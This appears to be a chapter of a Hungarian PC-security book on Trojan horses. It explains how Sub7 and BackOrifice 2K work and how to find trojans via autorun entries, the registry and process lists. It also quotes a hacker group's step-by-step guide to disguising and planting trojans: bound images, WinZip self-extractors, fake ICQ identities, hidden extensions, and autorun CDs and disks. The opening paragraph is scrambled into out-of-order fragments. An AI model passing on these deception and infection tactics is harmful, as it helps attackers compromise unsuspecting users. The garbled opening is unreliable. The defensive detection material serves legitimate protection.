fennálló kapcsolaton keresztül.Az elhelyezésre a hackereknek és az ilyen eszközök programozóinak is rengeteg ötletük van. Csak ezután lehet célzottan megszólítani. válogatás nélkül címeket szkennelni. a támadónak egy vezérlőprogramra is szüksége van. Az egyik legismertebb eset egy trójai elrejtése a Linux SÁTÁN 1. de kártékonyak is (adatok törlése) vagy kémkedők (adatok átadása). A kliens ehhez célzottan a fertőzött számítógép IP-címén szólítja meg a szervert. majd telepítem és konfigurálni kell a szervert a rendszeren. Szerencsére a programozás nagyon hibás volt. mint pl. az a felhasznált szoftvertől függ. milyen IP cím alatt. A szerver futtatása általában két lépésből áll. hogy a szerver az operációs rendszerrel együtt automatikusan elinduljon. A szerver konfigurálásánál meg lehet határozni a klienshez küldés módjait és az akciós lehetőségeket is. A második lépésben el kell érni. Egy programozó hozzáfért egy fejlesztői géphez. és a háttérben aktív legyen. mert nem lehet tudni. és ha igen. hogy a SÁTÁN indításakor a jelszófájlba egy bejegyzés került. dinamikus IP-címet kap. Ez a lépés többnyire az elhelyezéssel egybekötve történik. és vezérli a szervert Ha egy trójai távirányítási funkciókat kínál. megváltoztatta az Fpinget úgy. És már meg is lehet fogni a klienssel egy fertőzött számítógép szerverét. a szerverfájl mindjárt el is indul. Mivel a legtöbb felhasználó szolgáltatón keresztül létesít internetkapcsolatot. Ehhez a legtöbb trójainak integrált szkenneré is van. DOS parancssor-ra váltunk. választják. amellyel egy új felhasználót jegyzett be. Ez így nagyon egyszerűen hangzik. tehát amikor fennáll a kapcsolat a fertőzött számítógéppel. Amint a fertőzött számítógép kapcsolatba lép a hálózat- . mint a CD-ROM-meghajtó nyitása. így nem keletkeztek jelentősebb károk. aki ezzel elérést kapott. Ez megnehezíti a trójai szerver elérését. EzEgy másik lehetőség. A trójaik lehetnek programba integrálva vagy fájlokhoz fűzve (erről később többet). minden kapcsolódásnál egy másik. hogy az áldozataikhoz jussanak. Hogy a kliens milyen funkciókat tud vezérelni. amelyeket később még bemutatunk. az e-mail mellékleteket. 4. az a támadótól függ. A legkönnyebben úgy lehet megkaparintani az aktuális IP-t.2. és irányítani lehet azt. az IP-keresés viszonylag egyszerű. automatikus értesítést adnak. A különböző trójaiak leírása a továbbiakban következik. Először is aktiválni. ha a fertőzött számítógép a hálózatra. Az akciók lehetnek viszonylag ártalmatlanok. Hogy hogyan használja ki ezt a veszélyes potenciált. Az IP-címet a trójaitól és az eljárás módjától függően különböző utakon kapja meg a hacker: az ICQ-val történő elhelyezés esetén a következő kapcsolatnál közvetlenül lekérdezheti az áldozat aktuális IP-címét.0 forráskódja volt. ha nincs fennálló közveden online-kapcsolat.

Ezután a melt server after installation szerver opció segít. Erről az internet idevágó fórumain olyan rengeteg információ gyűlt össze. A szerver fájlokhoz fűzése a következő előnnyel jár: ki lehet indulni abból. tehát képekkel. Egyes trójai kiteknek. aki a szervert vezérli. A profik például más programokba integrálják a trójaiakat. sőt még a szerver ikonját is meg lehet változtatni. Képnek álcázzuk (valami nem gyereknek való mindig jól jön) vagy toolnak. amelyeket a programok egyébként is használnak: a képek JPEG fájlként megtévesztőén hasonlítanak az eredetire. hogy az áldozat mit kíván. A stratégiák egy része valóban profinak is mondható." 4.3 így álcázzák és terjesztik a trójaiakat Ehhez a hálón nagyon sok program áll rendelkezésre. PC-felhasználóként mindenesetre ismernünk kell ezeket. amelybe a szervert ágyazzák. A következőkben nemcsak az egyszerű álcázásokkal ismerkedünk meg.2 Álcázás a WinZip-pel A trójai ügyes elhelyezéséhez a világ leggyakrabban használt tömörítő programjának. Ha már így elterjeszted a szervert a nép körében. ha az áldozatot valóban meg akarjuk téveszteni egy fájllal. 4. ha megfelelő értesítőfunkciókkal rendelkező trójait használsz. vagy kérj meg egy baráti webmestert. A run command after unzipping parancs az archívból történő kicsomagolás után azonnal elindítja a szervert. az IP-t. míg mások inkább csak a hobby-hackerek eszközei közé sorolhatók. a szerver átküldi az aktuális IP-t a kliensnek. pl. Ezeket mindenki szívesen küldi és nézegeti. hogy az áldozat nem fogja gyanúsnak találni vagy rossz szándékot feltételezni arról a programról vagy a képről. és máris van egy tökéletesen álcázott trójai. attól függően. amennyiben az éppen online van. ICQ-n vagy IRC-n keresztül küldjük. A trójaiak minden esetben veszélyesek. mert ez a sikeres telepítés után azonnal törli a szervert. Tedd fel hasznos programként a honlapodra. ha hiányoznak a programozási ismereteik.GiF. Ezek arra valók. hogy könnyen és gyorsan tudják terjeszteni. vagy be lehet építeni segédprogramokba. Az archív ártalmatlan önkicsomagoló fájllá változik. akkor nem rossz. hogy bekösd a szervert. tehát EXE fájlokba. mert annak a szándékait uralják. különösen alkalmasak az animációk és a gag-programok. hanem a hobby-hackerek eljárásaiba is betekintünk. . így tud a hacker célzottan rajtaütni a fertőzött számítógépen. hogy trójait rejtettél bele. Hogy egy pillantást vethessünk a dolgok menetére. hogy kínálja a honlapján. vagy mail-ben küldi el az aktuális IP-t.3. a WinZip-nek a programbeállításait is használják egyes hackerek. inkább más utakat választanak. illetve az internettel. . amire szükséged van. JPG. „A szervert mail-ekén. amelyekkel a legkülönbözőbb fájlokkal lehet öszszekötni a konfigurált szervert. hogy értesítsenek. egy Defcon4 nevű hackercsoport (csak csekély mértékben módosított) szövegét fogjuk használni. olyan funkcióik vannak speciális konfigurációs fájlokban (Editserver). és mail-ben vagy ICQ-n keresztül üzenetet küldjenek neked.1 A trójaiakat fájlokba integrálják A szervert össze lehet kötni különböző fájlokkal. Ehhez minden ikon felhasználható. így a vélt DOC fájlok egy megnyugtató Winword ikont tudnak prezentálni. amelybe a szerver be van ágyazva. amelyben bizonyos információkat kapsz az áldozatról és számítógépéről. Ez akkor célszerű. hogy abból már igazi „gyűjtemény" áll össze. amint az áldozat online van.tál. pl. Ilyenkor egy új WinZip archívot készítenek. A veszélyes kis programok terjesztésére a legkülönbözőbb lehetőségeket agyalták ki a programozók. 4. mint például a Sub7-nek. Ikon-kiosztás a szervernek Olyan programnak. azt persze nem kell elmondani.) együtt csomagolják össze a szervert.3. A hobby-hackerek. és más fájlokkal (képek stb.

hogy a másiknak ehhez engedélyt kellene adnia. átvitelkor csak a photo. valamit fecsegni. egyszerűen várni kell pár napot." 4. Megkeressük az áldozatot a trójai terjesztéséhez. Az áldozatot persze nem kényszerítjük. Egy pár nap múlva azután már sokkal kisebb feltűnést kelt bármilyen állomány. és ez nem különösebben feltűnő. ez a trójai túl kicsi ahhoz. amelyen át más fájlokat lehet feltölteni és végrehajtani. és hozzáfűzzük a kontaktlistához. Amint ez a fájl az áldozat gépén egyszer lefutott. amelyben olyan fogalmak. Ilyen eset- ben már csak ártatlan kifogások segítenek. és aztán egy nagyon kicsi fájllal megpróbálkozni.3 A trójaiakat az ICQ-val is tovább lehet adni Ön is kedveli ezt a kényelmes kommunikációs szolgáltatást az interneten? Van már egy listája kedvelt „beszélgetőpartnereiről"? Akkor valószínűleg érdekelni fogják azok a lehetőségek. Egy Autorun.4 Elég egy CD és az automatikus lejátszás funkció A trójai kihelyezésének egyik kedvelt módja a CD-n keresztüli terjesztés. Ezek az alábbiak lennének: • A Sub7 trójai (magyarázat 1. Ekkor reális az esélye annak. Férfi áldozatokhoz általában a női identitás az ideális. hiszen a kontaktlistát a beleegyezése nélkül bővítették. Ezt többnyire a közeli környezetben található célok megtámadásához választják. mint egy nagyobb kép).jpg jelenik meg. A The Thing ezzel szemben csak kb. 40 Kbájt (nagyjából annyi. ha kezdetnek elküldünk egy pár tiszta fájlt. akkor amilyen jól csak lehet.3. ez így megy (megint a Defcon4 „információi" szerint): Először begyűjtünk minden eszközt. Ha a fájlt visszautasítja az ICQ-n keresztül. „Ha az áldozat tényleg gyanítja. Az ICQ Auto-Authorize/IP-Unhider-Patch megengedi UIN-ek hozzáfűzését a saját kontaktlistához. Ezzel egyidejűleg lehet online két vagy több UIN. A legtöbb trójai a sok szolgáltatás miatt már eleve akár 400 Kbájt is lehet. Nos. amelyek az ICQ-nak köszönhetően adódnak a hackereknek. anélkül. akkor is. A CD-ROM-on megváltoztatja az Autorun. az könnyen kiszámolhatja magának. Ha a fájl küldéséhez az ICQ-t használjuk.3. A legjobb. Álcázás az ICQ-val Ha lehet.exe nek nevezünk el. amely lehetővé teszi az ICQ több példányának a párhuzamos indítását. mint hacker meg hasonlók garantáltan nem fordulnak elő. Sokkal jobb. amilyen például a The Thing. Ezen kívül az infóban minden személy IP-jét megmutatja.4. lent) • MICQ (többször elindítja az ICQ-t) • ICQ-AutoAuthorize/IP-Unhider Patch • The Thing (kis trójai) A MICQ egy program. hogy egy fájl mögött vírus vagy trójai rejtőzik. még mindig el lehet neki küldeni egy pár nappal később egy anonim mail-fiókról. megnyílik egy hátsó kapu. hogy elfogadja a fájlt.jpg. álcázzuk a saját identitásunkat. Tehát akinek van egy kis tapasztalata. ha ez a funkció nálunk nincs aktiválva (az IP-ről és kiosztásáról lásd az alapismeretekről szóló fejezetet). A The Thing egy kis trójai. amely egy trójaira utal . hogy az áldozat észreveszi a támadást. a régebbi ICQ-verziók egy kis búgját is kihasználhatjuk: ezek általában nem mutatják meg a fájlvégződéseket. Ha egy fájlt photo. amire szükségünk lesz. Ehhez egy program vagy egy játék kalózmásolatát használja a hacker. hogy feltűnjön. ha generálunk egy új ICQ-UIN-t (a MICQ-val többel is online lehetünk egyszerre).inf fájlt.inf szövege. Mint már mondtuk. hogy mi rejtőzik egy ilyen fájl mögött. A hacker ráér A szervert általában nem az első kapcsolatfelvételnél küldjük el az ICQ-n keresztül.

Ebben a két esetben más késztetések vannak a háttérben. 4.a Kurnyikova-vírus jó példa a sikert ígérő környezetekre.bat néven menti. és támadhatóvá teszi az áldozatot. a trójai is elindul. amelyek magas rákattintási és ezzel installálási arányt garantálnak.bat-ot. Ez utóbbinál nem kell célzott támadásokkal és hasonlókkal bajlódnia a hackernek. hogy a user előtt ne jelenjen meg a futtatás DOS-ablakban. milyen stratégiákkal tudja egy hacker célzottan megközelíteni az áldozatát. mind a kiértékelés/felhasználás szempontjából sokkal ráfordítás-igényesebbek. A batch-fájl elindítja a szervert anonimitása védi a tettest.7 Mit csinálnak a hobby-hackerek a trójaiakkal? A kérdés az első hallásra figyelemreméltóan hangzik. de ha belegondolunk. a másik Xxdata mappába másolja a szervert.3.AVI vagy *. mint azt majd a következő fejezet mutatja. és erre.6 További terjesztési stratégiák A trójaiak terjesztésének különböző stratégiái immár világossá váltak. A Film Data mappába másolja a tulajdonképpeni filmet (*. A trójai tulajdonképpen minden esetben olyan támadási technikát jelent. Esetünkben tehát a szervert is. mert az ilyen tömeges fertőzések mind a tervezés.Az alapelv a következő: a felhasználó beteszi a CD-ROM-ot a meghajtójába. és ekkor a következőképpen működik. Az adatok azonnali tönkretétele inkább személyes ellenségeskedésből fakad. mint a rombolás. mielőtt a megfelelő számú kihelyezés megtörténhetne. de technikailag nem elég képzett ahhoz. a legtöbb ember ugyan kíváncsi. amelyek úgy szaporodnak. és Film. Most az editorral készít egy batch-fájlt (kötegelt parancsfájlt) a lemez főkönyvtárában. A hacker létrehoz egy mappát a lemezen. amelynél fontosabb a hozzáférés. A terjesztés CD-n keresztül is inkább a hobby-hackereknek való. de ha csupán a nagy mértékű pusztítás a cél. Ez a legegyszerűbben férgekkel (warm) érhető el. 4. Egy trójait gyorsan nagy számban elhelyezni nemcsak ideális álcázást kíván . hogy a levelezési címlisták minden címére elküldik magukat.3. Ebben a mappában létrehoz még két további mappát. mert a hordozó csak a tartalma révén (játék. Persze azért ez a motívum sem zárható ki. anélkül. hogy észrevehető lenne. amelynek például Film a neve. feltört program stb. Emellett természetesen terjesztési stratégiát is kell fejleszteni. És mostanra már tudják.3. az egyik neve mondjuk Film Data. hanem egyszerűen az időfaktorra (dátumvezérlés) vagy a használati gyakoriságra (a rombolás x fájlindítás után indul) épít.x automatikus lejátszás funkcióját használja ki a hacker. Egy nagy számban kihelyezett trójaiból beérkező adatokat természetesen ki is kell értékelni.5 A lemezek majdnem ugyanígy működnek Ez az alapelv a lemezekre is átvihető. és elindítja a Film. Fontosabbak a hálózati hozzáférési jelszavak stb. Ez egy CD-ROM felismerése után azonnal kiértékeli a megfelelő Autorun. Ha ezt a lemezt most megkapja a felhasználó. Ezzel szemben egy letöltésre kínált anyagot először fáradságosán ismertté kell tenni. hogy célzottan jelszavakat vagy hasonlókat kutasson ki. 4. Az olcsó szörfözésre utaló jelszavak viszonylag érdektelenek. Addig pedig a terv még csődöt is mondhat. Az @echo parancs szolgál arra. Természetesen egy trójaival jelentős károkat lehet okozni. mert nem minden trójai kínál valóban érdekes adatokat a hackereknek. és a szerver automatikusan elindul a játék bevezetőjével együtt. az internet-kapcsolat . egy vírus végülis sokkal sikeresebb. A talán legfontosabb és legsikeresebb eljárás a letöltésre kínált anyagokkal és a vírusokkal való terjesztés.inf fájl adatait és végrehajtja a fájlt. alkalmasabbak a vírusok.) válik igazán vonzóvá. Ehhez a Windows 9. A közvetlen kapcsolatok az ICQ-n keresztül elsősorban a közelebbi és a távolabbi ismerősök területén könnyítik meg a terjesztést.MPEG fájlt). amely lehetővé teszi az elhelyezést világszerte több ezernyi számítógépen. a másiké Xxdata.

ne nagyon bántsátok az áldozat adatait. A Sub7 a legkomolyabb és a neten legelterjedtebb trójaiak közé tartozik. az interneten található „szabályokból" is láthatjuk.4. hogy az már nem túl vidám dolog. Ez azt jelenti. egy ilyen szoftverrel a teljes ellenőrzést át lehet venni egy fertőzött számítógép felett. nem?" Önfertőzés ügyetleneknek Azoknak a hobby-hackereknek. Amint hozzáférünk az áldozat adataihoz. . hogy a megfelelő kliens tulajdonosa minden olyan funkciót végrehajthat a fertőzött gépen. azt az úgynevezett portszkennek mutatják.01!). amelyek „több mint elég" fertőzött rendszert jelentenek. és tovább tanulmányozhatnád a trójai sok funkcióját. a következő tanácsot tartja készenlétben az internet: „Ha az ember az első fertőzési kísérleteknél saját magát fertőzi meg. illetve hogy még most is az. amint azt a következő. Először túrd át pár napig az áldozat gépét. információkat fűzhetnél dokumentumokhoz. hogy valójában mit is akarnak kezdeni az áldozat gépén. és törli a szervert!" Pillanatkép egy trójairól 4. Ezzel a Windows programmal viszont minden hálózati kapcsolatot meg lehet nézni. és nézd meg az összes adatát. nem kell mindjárt nekikezdeni a mulatságnak.azért ez förtelmes lenne. Azóta ez a backdoor-tool folyamatosan tökéletesedik és új funkciókkal bővül. Legyetek szívesek.1 Támad a Sub7 A Sub7 tágabb értelemben egyfajta távkarbantartó programhoz hasonlítható. a PCAnywher a Symantectől. Destruktív módon felhasználva.A legtöbben azonban. akik kísérletezés közben saját magukat fertőzik meg trójaival. mint a Sub7. amelyek egymáshoz kapcsolódva gondoskodnak a támadó gép és a fertőzött gép kapcsolatáról.egy trójai rémisztő lehetőségekkel A Sub7. egy Mobman álnéven működő programozó „válaszaként" a NetBusra és a BackOrifice-vz. Egy olyan trójai. megváltoztathatnád a startlapját. \windows\netstat. fogja. amit a gép tulajdonosa is megtehet. Hogy világszerte milyen sok rendszer volt Sub7-tel fertőzött.exe-t. tulajdonképpen nem is tudják. Általában kíváncsiság és egy adag vandalizmus rejtőzik a háttérben. azaz a remote access tool vagy remote administration tool. nagyobb hálózatokban. „Ha sok fantáziával és több ICQ-UIN-nal végre sikerült egy trójait elültetnünk az áldozat számítógépén. több fájlból áll.0. egy backdoor-trójai.. akik csak úgy kísérletezgetnek egy kicsit ezzel. Mindannyian tudjuk.4 Sub7 . 1999 márciusában került a hálóra az első verziókban. Az egyes funkciók későbbiekben történő említése bizonyosan hozzá fog járulni az ilyen szoftverből eredő potenciális veszélyek felméréséhez. ha fontos adatokat veszítünk el. Én személy szerint teljes mértékben az adatmegsemmisítés ellen vagyok. A távkarbantartó szoftver. 4. a rendszergazdák távkarbantartó és konfigurációs munkáját könnyíti meg a hálózatba kötött számítógépeken. Ismert remote access program pl.. akkor egyszerűen kliensként összeköttetésbe lép saját magával (a saját gép IP-je mindig 127. elsőként töröljük a C. Áthelyezhetnél fájlokat.

Las Vegasban. hogy a szerver közvetlenül a telepítés után azonnal elinduljon-e. . Azt is meg lehet adni. Ehhez jönnek egyes ICQ-beállítások (értesítés. Ugyanezen év augusztus 7-ig a programot több mint 35 ezerszer töltötték le a CDC honlapjáról. Egy ügyesen programozott kliens/szerver alkalmazásról volt szó. így például a magasfokú titkosítással. mert a BackOrifice ezután is az egyik legkedveltebb trójai maradt. 4. és ezzel irányítóközpontként működhessen. menükkel és kiválasztómezőkkel. A Microsoft válasza nem váratott magára sokáig. amelyekről egészen kényelmesen el lehet indítani az egyes funkciókat. és új képességekkel bővítette. Különösen ennek kellett a BO2K-t érdekessé tenni a hálózati rendszergazdák számára. hogy az a szervert az installáció előtt elrejtse. a port. UIM-kicsomagolás). hanem kizárólag dokumentált Windows funkcióhívásokat. augusztus elején mutatta be a texasi Cult of the Dead Cow hackercsoport a BackOrifice Windows Remote Administration Tool-t egy hackertalálkozón.A Sub7 szervere A szerver ahhoz szükséges. hogy a műveleti konzolok (kliens) között kapcsolatot teremtsen. A Sub7-nek kapcsolata van a szerverre! így előkészítve sokféleképpen közelíti meg a támadó az áldozatát.Hálózati eszköz vagy támadás a Microsoft ellen 1998.a Windows 95/98 alatti súlyos biztonsági hiányosságok feltárása. A BackOrifice célja . jelszókikémlelés. és hogy egy másik futtatható fájlhoz kapcsolódjon-e. amelyről a trójai kommunikál (az újabb verziókban véletlenszerű is lehet . továbbá itt lehet meghatározni a szerver nevét is. hogy miként telepítse magát a célgépre a szerver. bár azt nem ismerték el. és hogy a felhasznált port rejtve legyen-e. hogy Sub7-es fertőzöttségről lehessen beszélni. és irányítsa a fertőzött gépet. gombokkal. A 2000-ben a Cult of the Dead Cow (CDC) kihozta a BackOrifice új verzióját: a BO2K-t.5 BackOrifice 2K .itt a port a futási időben derül ki). hogy Windows 9x alatt biztonsági problémák lennének.állította a hackercsoport . hogy az átvitt adatok egy harmadikhoz kerüljenek. A CDC ezzel a verzióval „trójainak" kikiáltott programjának a hírén akart javítani. amely csaknem lehetetlenné teszi. A klienst teljesen hagyományos Windows-programként kell elképzelni. és megkísérli a célrendszerre telepíteni a szervert. amely trójai falóként észrevétlenül tudott futni egy Windows 9x operációs rendszeren. Edit-Server Az Edit-Server egy kiegészítő program. A hackereket azonban ezek a dolgok nem nagyon érdekelhették. Itt lehet például rögzíteni. grafikus felülettel. amellyel a szervert lehet konfigurálni. Ennek a modulnak tehát feltétlenül telepítve kell lennie az irányítandó rendszerre ahhoz. hogy a trójai egyes funkcióit inicializálja. Pillantás a Sub7 váltóközpontjára Minden működést a kliens irányít A kliensre azért van szükség. És ehhez a program nem a Windows operációs rendszer valamiféle búgjait vagy belső dokumentálatlan API-jeit használja.

és ez a vírusvizsgálónak jelentős problémákat okozhat. felmerül a kérdés. Hogy az ilyen esetekben mit tehetünk. Ezt a gyártók gyakran nem állítják be előzetesen. nem vagyunk-e már magunk is fertőzöttek. illetve karanténba tenni. hogy az adatok kódoltan közlekedjenek a kliens és a szerver között. bo2kgui. hogy fájlokat lehessen kicserélni. port. Arra is figyelnünk kell. és kisebb bővítéseket (pluginek) hozzáfűzni. Ha a szerver csak egyszer is elindul.dll io_stcpio. mivel az ilyen programok keresése gyakran beavatkozásokat igényel a rendszerbe. az még messze nem jelenti azt.exe szekötéséhez. inkább kérjünk tanácsot szakembertől.6. 4. amelyen a rendszerkönyvtárba másolódik stb. hogy a Minden fájl ellenőrzése vagy hasonló funkció aktív legyen. Mobman például beépített egy ilyen funkciót a Sub7-be. a szerver neve. így ezeket nem lehet BO2Kadatforgalomként (Traffic) felismerni.dll B02K pluginek Ez a plugin látja el az értesítési funkciókat: ha a szerver elindult. .6 így ismerjük fel a trójait a rendszerünkben Most. azt a következő szakasz részletezi. automatikusan a C:\Windows\System könyvtárba másolja magát. Fájlok és funkcióik együttműködése 4. Mielőtt a kliens a szerverrel kapcsolatba tudna lépni. A szervert kiegészítő részekkel (pluginek) még bővíteni lehet. anélkül. Sőt bizonyos esetekben még ahhoz is vezethet. A BO2K legfontosabb fájljaihoz jön még néhány plugin: Fájl bo2k_inetcmd. A gyakorlatlan felhasználónak ez nehéznek tűnhet. Vannak azonban olyan programok.exe A kliens a BO2K „látható" része.5. srv_rattler.dll enc_serpent. A Registry-be is bejegyzi magát úgy. amelyek jelentősen megkönnyítik a standard trójaiak felkutatását. Ezért szeretnék itt néhány lehetőséget bemutatni. Ha a vírusvizsgáló nem talál fertőzött fájlokat. Ha a vírusvizsgáló fertőzést talál. Ez a plugin gondoskodik arról. hogy ez állandóan aktualizálva legyen. a gép már megfertőződött. a Rattler mailben elküldi az áldozat IP-jét. amelyen a szerver és a kliens összekapcsolódnak.dll Funkció Lényegében ezek a szerver alapfunkciói. néhány dolgot még be kell állítani rajta (jelszó stb. A trójaiak leküzdésének most következő módjánál nagyon óvatosnak kell lennünk. hogy minden Windows-indításkor automatikusan aktiválódjon.4. Az IP (ez a címe egy PC-nek az interneten) is szükséges a kliens és a szerver öszbo2kcfg. A SERPENT feladata.1 Vírus. A grafikus felhasználói felületen keresztül lehet a fertőzött PC-t távirányítani. A trójai rejtőzködhet . hogy elkerüljük az esetleges károkat. hogy különösebb ismeretekre lenne szükség róla.vagy jobban mondva: a gép totál lefagy.). hogy a szkenner ne törölje azonnal a fertőzött fájlokat. Ez a plugin az első pillantásra ugyan nem nyújt új lehetőségeket.1 A BO2K és összetevői íme egy áttekintés a legfontosabb fájlokról és funkcióikról a távkarbantartási funkciók és a trójai működés komplex együttműködésében. a megtisztítás különböző lehetőségeit fogja javasolni. mert egyes trójaiak szerzői biztonsági intézkedéseket építettek a programjaikba az eltávolításnak e módja ellen. hogy a trójai falovak bevetésének a lehetőségei és potenciális veszélyei ismertté váltak. hogy a rendszer használhatatlanná válik . Ha elindul. mert a szkennelés így túl sokáig tarthat.) végezni a szerveren. hogyan lehet felismerni és leküzdeni egy rendszerben a trójai vírusokat.tekintsünk el az érintett fájlok törlésétől. Továbbá feltétlenül szükséges. illetve a Registry-be.és trójai-szkenner Alapvetően minden rendszerben mindig kell telepített vírusvizsgálónak lennie.exe Funkció Ez a szerver. Ha nem vagyunk biztosak magunkban. Először . de ez kódolja a TCP-csomagok headerét.és megtévesztheti a víruskeresőt. hiszen szinte naponta fedeznek fel új trójaiakat. Ezzel a programmal lehet fontos beállításokat (kódolás.mint mondtuk . hogy a számítógép tiszta. Fájl bo2k. Az első vizsgálat előtt figyeljünk arra. Próbáljuk meg a fájlokat izolálni.

6.lehetséges. de nagyon ritka Ha a winstart. és szerencsére nagyon ritkák is. Ezeket a trójaiakat azonban nehéz realizálni. 4. Mivel azonban ez a lehetőség is adott. Az indulásnak ezt a lehetőségét a rendszerindítással együtt sok ártalmatlan program (pl.2 AutoRun bejegyzések Egy trójai csak akkor működik.x-es időkben volt érdekes Régebben nagyon kedvelt módszer volt a Win.elég ritka Ebben a fájlban a shell= paraméter alatt fordulhat elő bejegyzés. Ez az indítási lehetőség azonban nagyon valószínűtlen. A trójaiak ritkán használják ezt a lehetőséget.) is használja. Ezzel a programmal a fent nevezett bejegyzések közül sokat ellenőrizhetünk. kis rizikófaktorral Itt is óvatosnak kell lenni a törléssel. Több ablak is megnyílik szövegszerkesztő formában.ini bejegyzésein keresztül indítani a trójaiakat. Számos más Registry-bejegyzési lehetőség is előfordul autorun célból.ini . írjuk be a Start/Futtatásba a sysedit.bat-ban felismerhető egy bejegyzés. backup programok stb. config. az illető ikonra duplán kattintva érjük el őket. mint a Windows NT. A control. és egy trójait indíthatnának el.ini a Windows 3. Menjünk egyszerűen a Start gombra.exe nevű bejegyzés. Gördítsük az alsó gördítősávot egyszerűen jobbra. mint az msconfig-nál. mert ide is bejegyzi magát néhány ártalmatlan program. Itt megintcsak ajánlatos az óvatosság.sys . hogy ne legyenek rögtön láthatóak.ez már izgalmas A regisztrációs adatbázisban megnevezett útvonalak mappákként jelennek meg. illetve parancsikonokat kell törölni.sys szintén a sysedit. és esetleg programokat.ini . mint a Win. Hogy ezt kizárjuk. aztán a Futtatás-ra. amelyet az utolsó rendszerindítás előtt töröltek. Az olyan rendszereknél.3 Windows Registry . ezt semmiképpen se töröljük! Az Explorer.bat-ot is a sysedit. A config. Eddig alig ismertek olyan trójaiak.csak a szokatlan eszközmeghajtók veszélyesek Néhány ritka trójai a Windows 95/98-s rendszerek eszköz-meghajtójaként is álcázza magát. autoexec. uninstallprogramok.ini-t. Járjunk el úgy. Óvatosan! Itt már van egy Explorer. amelyek ezt az utat használnák. a mappát a felhasználói profilokon keresztül lehet megtalálni (C:\WinNT\Profiles\ Username \Startmenü\Programok \Indítópult).exe-t. mert nagyon nagy a felfedezés valószínűsége.kevésbé valószínű Klasszikus változat az automatikusan indítandó programok indítására az autostart (Indítópult)-mappa. Ez azt jelenti.bat vagy control.exe-vel lelhető fel. ez rendszerint azt jelenti: egy parancssor egy fájl másolását írja elő.4. De persze a parancsokat többnyire rengeteg üres karakterrel álcázzák a paraméter-megnevezések mögött. Az Indítópultot a következőképpen lehet ellenőrizni: közvetlenül a Start menüből: Start Programok Indítópult vagy C:\Windows\Startmenu\ProgramokMndítópult.exe után azonban még további bejegyzések következhetnek. mielőtt bármit is törölnénk.exe-vel lehet megnézni és szerkeszteni. A Win.de ez is nagyon ritka. Autostart (Indítópult)-mappa . winstart. Nézzük meg a Load és a Run paraméterek mögötti bejegyzéseket. System. Itt aztán szokatlan dolgok után kell kutatni.ini-t ugyanúgy nyitjuk meg szerkesztésre. és írjuk be msconfig. míg a sor végét is látjuk. és kényelmesen megváltoztathatunk.DOS-os hulladék.6. A sysedit-tel is sokat megtalálhatunk a fentiek közül. de a trójaiak is. hogy online kapcsolat esetén kész legyen parancsokat fogadni a klienstől. amelyeket nem ismerünk. vírusvizsgálók. ha a rendszerindítással együtt elindul.ini-ben is el lehet helyezni egy bejegyzést az automatikus indítás céljából. helyette azonban ezt írjuk be: sysedit. . Szükség esetén távolítsuk el a gyanús bejegyzéseket. de persze ezeket (szerencsére) csak ritkán használják a trójaiak. Az autoexec. Hasznos segítség a Windows saját msconfig programja is. A System. hogy a szervernek a rendszer hátterében állandóan futnia kell. hát megemlítjük.bat .

Eszközmeghajtónak álcázás Egy trójai. Itt is egy Registry-be került bejegyzést keresünk.Következőként hívjuk meg a Rendszerleíró adatbázis-szerkesztőt a Start/Futtatás/Regedit-tel. aminek a törlése rendszerproblémákat okoz. hanem csak a program nevét! ICQ-usereknél fennáll egy további lehetőség a következő bejegyzésnél: Registry Installed Components Vannak még az úgynevezett „Unknown-módszerek". Ezek alatt az útvonalak alatt a következő bejegyzések találhatók: Registry Common Startup kulcs A bejegyzés általában Ez alatt az útvonal alatt található a szerver is. Megnyílik egy program félelmetesen sok bejegyzéssel. Ilyen esetben nem egyszerű a pontos azonosítás. Ha valamelyik kulcs még egy futtatható fájlt is tartalmaz. Itt is a Windows Registryt használják a program automatikus indításához. mint már említettük. Rendszerint azonban csak az itt megnevezett bejegyzések vannak. azonban egy „szokatlan" path-on: . Végülis lehet az egy valódi meghajtó is. Ezek közül csak néhány útvonal érdekes: A „%1" %*" karakterek elé be lehetne írni még egy programot. Gyanú esetén ne az egész bejegyzést távolítsuk el. eszközmeghajtónak is álcázhatja magát. a shell paraméterrel. amögött egy trójai rejtőzhet. illetve a Windows-regisztráció.

exe mérete a Windows 95 alatt 11264 bájt. Például a Ctrl+Alt+Del billentyűkkel. Tehát ha találunk egy runonce. Az eredeti Windows runonce. mert tényleg mindent könyörtelenül megmutat. ami a Windows alatt adódik. amelyet a Taskmanager-rel együtt lehet elindítani. Ez a módszer azonban egyáltalán nem biztos.exe-t. Az eredeti runonce. mert a legtöbb trójai „tudja". és válasszuk a Mindent megmutat opciót. akkor itt is el lehet rejtve egy trójai.5 A runonce. Windows 98/ME alatt pedig 40960 bájt. hogy legközelebb egy trójai töltődik be. és először elvégez néhány vizsgálatot. amely mutatja a futó programokat. 4.exe-t egy módosított fájlra cseréli.exe-vel a C:\ meghajtóra Egy bug miatt a Windows először mindig az első.exet futtatja le (kétséges esetben a C:\ könyvtárban). hogy kell elrejtőzni a Taskmanager elől.4. Menjünk a Nézet menüpontra.8m. Hangsúlyozzuk. hogy a „futó feladatokat" ellenőrizzük. A Windows-zal azonban egy jó kis eszközt is kapunk a futó folyamatok ellenőrzéséhez. LEHET! Ennek a módszernek a további magyarázatához az angolul értők olvassák el a Schoolbus 2. mielőtt a tulajdonképpeni explorer.4 Módszerek az Explorer. . A Windows 2000-be is integráltak egy nagyon jó folyamat-nézőkét.exe a C:\ -n azt eredményezhetné. A Start menü Futtatás-ba írjuk be: drwatson. megtalált explorer. „Futó folyamatok ellenőrzése" módszer Gyakran lepleződik le egy trójai úgy.6. Ezeket különböző módokon lehet megfigyelni. Itt futtatható fájlokról van szó. A program neve: DrWatson. A program elindul.exe (C:\windows\) elindulna. Kezdőknek azonban a DrWatson bonyolultnak tűnhet. Megjelenik egy ablak. amelyeket ennek megfelelően be is lehet zárni.0 trójai leírását. amelyek a rendszerrel „együtt futnak". amely így lehetővé tesz egy autorun eljárást. amely a C:\windows\system könyvtárban vagy máshol található. amelynek más a mérete.6. amely a http://serdarka. Az explorer.exe kicserélése Csak a Schoolbm trójainál ismert.com/ weboldalon található.

